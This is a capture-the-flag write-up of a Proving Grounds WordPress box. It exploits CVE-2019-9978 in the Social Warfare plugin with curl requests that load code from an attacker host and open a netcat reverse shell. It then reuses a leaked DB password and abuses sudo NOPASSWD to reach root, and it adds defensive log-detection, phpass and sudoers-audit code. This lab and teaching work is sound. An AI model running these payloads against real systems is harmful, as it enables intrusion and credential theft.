Hi amazing hackers from around the world, back again with another write-up of a box. This time it’s from OffSec’s Proving Grounds. If you would like to check out more write-ups, please do check my GitLab repository.
Enumeration
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
This is the basic information you get from the scan.
Web
- Apache 2.4.38
- WordPress 5.5
- robots.txt contains :
/secret -> 404
# haha, just kidding. Focus on real stuff ma boi
Looks like it’s just a fake robots.txt; that’s fine, keep enumerating!
FeroxBuster
FeroxBuster is a tool to discover directories and files on a server. It’s pretty similar to GoBuster, but it’s much faster and it has emojis!
- Found
/wordpress
200 3l 5w 23c http://192.168.85.123/
301 9l 28w 320c http://192.168.85.123/wordpress
- Now that we know we’re running WordPress we can run another tool.
WPSCAN
wpscan is a tool made by wpscanteam to enumerate and test the security of the CMS WordPress.
- 1 user identified,
admin
- Plugins detected
social-warfare
version 3.5.2
Exploit
Now we have some information about our target, let’s do some research!
- Research indicates the plugin is vulnerable to CVE-2019-9978
- Found this exploit which explains how it works and what is vulnerable
curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=hostname&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"
- We’ll see the hostname in the response
wpwn
<!DOCTYPE html>
<html lang="en-US">
<head>
- Let’s get a reverse shell.
- Payload needs to be URL encoded.
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff
curl "http://192.168.85.123/wordpress/wp-admin/admin-post.php?rce=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.49.85%209001%20%3E%2Ftmp%2Ff&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php"
- pwncat is a tool similar to netcat, but it has more features than netcat.
[15:09:39] Welcome to pwncat 🐈! __main__.py:153
[15:10:28] received connection from 192.168.85.123:54858 bind.py:76
[15:10:31] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:504
[15:10:34] 192.168.85.123:54858: registered new host w/ db
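The request above is also what a defender should be looking for in the web server logs: a hit on wp-admin/admin-post.php with swp_debug=load_options and an swp_url that points at a host the plugin has no business fetching from. The following is an added detection example written for this write-up, not code from the box, the plugin or any exploit. It parses Apache combined-format access log lines and flags that pattern; the log lines and the TRUSTED_OPTION_HOSTS allowlist are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" access-log format:
# client ident user [timestamp] "METHOD target HTTP/x.y" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Hosts the plugin may legitimately load option files from. This allowlist is a
# hypothetical value for the example; a real one would hold only the vendor's hosts.
TRUSTED_OPTION_HOSTS = {"warfareplugins.com"}


def parse_line(line):
    """Split one access-log line into fields, with the query string decoded."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # keep the first value of each parameter; parse_qs URL-decodes for us
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def classify(rec):
    """Return a reason string if the request matches the CVE-2019-9978 abuse
    pattern (admin-post.php + swp_debug=load_options + attacker-controlled
    swp_url), otherwise None."""
    if not rec["path"].endswith("/wp-admin/admin-post.php"):
        return None
    q = rec["query"]
    if q.get("swp_debug") != "load_options":
        return None
    swp_url = q.get("swp_url")
    if swp_url is None:
        return None
    host = urlsplit(swp_url).hostname or ""
    if host in TRUSTED_OPTION_HOSTS:
        return None
    reason = f"load_options fetched from untrusted host {host!r}"
    if "rce" in q:
        reason += " together with an 'rce' parameter"
    return reason


def scan(lines):
    """Run classify() over every parsable line; return (client, timestamp, status, reason)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec)
        if reason is not None:
            findings.append((rec["client"], rec["ts"], rec["status"], reason))
    return findings


# Constructed sample log lines (not real traffic); the second reproduces the
# request shape shown in the write-up.
SAMPLE_LOG = [
    '192.168.49.85 - - [15/Sep/2020:15:05:12 +0000] "GET /wordpress/ HTTP/1.1" 200 23456 "-" "Mozilla/5.0"',
    '192.168.49.85 - - [15/Sep/2020:15:09:39 +0000] "GET /wordpress/wp-admin/admin-post.php?rce=hostname&swp_debug=load_options&swp_url=http://192.168.49.85:8000/exploit.php HTTP/1.1" 200 512 "-" "curl/7.72.0"',
    '10.0.0.7 - - [15/Sep/2020:15:12:01 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://warfareplugins.com/options.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, ts, status, reason in scan(SAMPLE_LOG):
        print(f"{ts} {client} HTTP {status}: {reason}")
```

Only the second sample line is reported. The allowlist matters: the plugin's debug path fetches from swp_url by design, so the signal is the external host (and, on this box, the extra rce parameter), not the mere presence of swp_debug. Running something like this over the access log, or the equivalent rule in a WAF, would have caught the first curl long before the reverse shell.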
Privilege Escalation
Now that we have a shell in the machine, it’s time to escalate our privileges!
- We are user www-data; we would need a password to run
sudo -l
- Found MySQL credentials for DB.
/** MySQL database username */
define( 'DB_USER', 'wp_user' );
/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
wp_user:R3&]vzhHmMn9,:-5
- Found hash for admin in wp_users table.
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1 |
+------------+------------------------------------+
- The hash is a WordPress (phpass) hash, hashcat mode 400.
- While we’re trying to crack the password, we should look around more.
- Found local.txt in
/var/www
80d2c0fa4fec51cad65e486bbecf34ab
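What "mode 400" actually means is worth understanding, because it explains why cracking is even an option here. WordPress stores passwords in the phpass portable format: $P$, one character encoding the cost, an 8-character salt, then a custom base64 of MD5 iterated 2^cost times. The B in the admin hash above means 2^13 = 8192 rounds of MD5, which is cheap on a GPU. The code below is an added example written for this write-up (not WordPress's or phpass's own code); it parses the format, reports the iteration count, and hashes/verifies a constructed password so you can see the round trip. The only data taken from the page is the admin hash string, used to decode its cost; the passwords and salts are made up.

```python
import hashlib
import hmac
import os

# phpass's alphabet: index 0 is '.', so 'B' is index 13 -> 2^13 iterations
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass's own base64 variant (not RFC 4648): 6 bits at a time, little-endian."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_iterations(setting):
    """Decode the work factor stored in character 4 of a $P$ / $H$ hash."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("invalid iteration count")
    return 1 << count_log2


def phpass_crypt(password, setting):
    """Recompute the phpass hash of `password` under the cost and salt in `setting`."""
    count = phpass_iterations(setting)
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("invalid salt")
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):            # the expensive part: 2^cost chained MD5s
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h, 16)


def phpass_hash(password, count_log2=13, salt=None):
    """Create a new hash; cost 13 (8192 rounds) matches hashes that start with $P$B."""
    if salt is None:
        salt = _encode64(os.urandom(6), 6)   # 6 random bytes -> 8 salt characters
    setting = "$P$" + ITOA64[count_log2] + salt
    return phpass_crypt(password, setting)


def phpass_verify(password, stored):
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_crypt(password, stored), stored)


if __name__ == "__main__":
    # Hash string from the write-up; only its cost character is decoded here.
    print(phpass_iterations("$P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1"))  # 8192
    demo = phpass_hash("constructed-demo-password", salt="oIPbgc5i")
    print(demo, phpass_verify("constructed-demo-password", demo))
```

A phpass hash is 34 characters and carries its own cost, so a defender can audit the wp_users table for the cost in use. Compared with bcrypt or Argon2 at sensible parameters, 8192 rounds of MD5 costs an attacker almost nothing per guess, which is exactly why a reused or weak admin password on WordPress is so dangerous; strong, unique passwords (or a plugin that switches the hasher) are the practical mitigation.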
One thing that I like to check is that usually the DB password is reused for the user password
- We have one user, which is
takis
- The DB password is reused for user takis. We are now user takis.
- Check
sudo -l
User takis may run the following commands on wpwn: (ALL) NOPASSWD: ALL
Will you look at that, we don’t even need to find another vector to escalate to root.
- We can run sudo on anything, so run
sudo bash
to gain root privileges.
- proof.txt is in /root
a6f62db372a1a76f723cc2a8e1594ec6
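The root step works only because of one line in sudoers: an (ALL) NOPASSWD: ALL rule for a regular user, which turns any credential leak (here a reused DB password) straight into root. The snippet below is an added example written for this write-up, not from the box or any tool on it: a small sudoers auditor that parses rules in the sudoers file format, rates "all commands" grants, and is run over a constructed set of lines that includes the rule takis has and a properly scoped alternative.

```python
import re

# user_or_group  hosts = (runas) [TAG: ...] command, command   (sudoers user spec)
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+?)\s*$'
)
TAG_RE = re.compile(r'^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*')


def parse_rule(line):
    """Parse one sudoers line into a dict, or return None for comments/Defaults/blank lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if m is None:
        return None
    rest = m.group("rest")
    tags = []
    while True:
        tm = TAG_RE.match(rest)
        if tm is None:
            break
        tags.append(tm.group(1))
        rest = rest[tm.end():]
    return {
        "who": m.group("who"),
        "hosts": m.group("hosts"),
        "runas": m.group("runas") or "root",   # sudoers defaults the runas user to root
        "tags": tags,
        "commands": [c.strip() for c in rest.split(",")],
    }


def assess(rule):
    """Severity of a rule: 'high' for password-less ALL, 'medium' for ALL with a
    password, None for scoped commands or for root's own default rule."""
    if rule is None or rule["who"] == "root":
        return None
    if "ALL" in rule["commands"]:
        return "high" if "NOPASSWD" in rule["tags"] else "medium"
    return None


def audit(lines):
    """Return [(who, severity, commands)] for every rule that deserves review."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        sev = assess(rule)
        if sev is not None:
            findings.append((rule["who"], sev, rule["commands"]))
    return findings


# Constructed sudoers content for the example; the takis line mirrors the
# 'sudo -l' output in the write-up, the deploy line is the least-privilege alternative.
SAMPLE_SUDOERS = [
    "Defaults env_reset",
    "root    ALL=(ALL:ALL) ALL",
    "%sudo   ALL=(ALL:ALL) ALL",
    "takis   ALL=(ALL) NOPASSWD: ALL          # what this box had",
    "deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart myapp.service",
]

if __name__ == "__main__":
    for who, sev, cmds in audit(SAMPLE_SUDOERS):
        print(f"{sev:6} {who:8} -> {', '.join(cmds)}")
```

The deploy rule shows the shape a NOPASSWD grant should take if one is needed at all: a single absolute command with its arguments, run as a named user. The takis rule is reported as high; %sudo as medium, since it at least still requires the member's password, which is the whole reason password reuse was enough to win here.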
And that’s all, we’re root!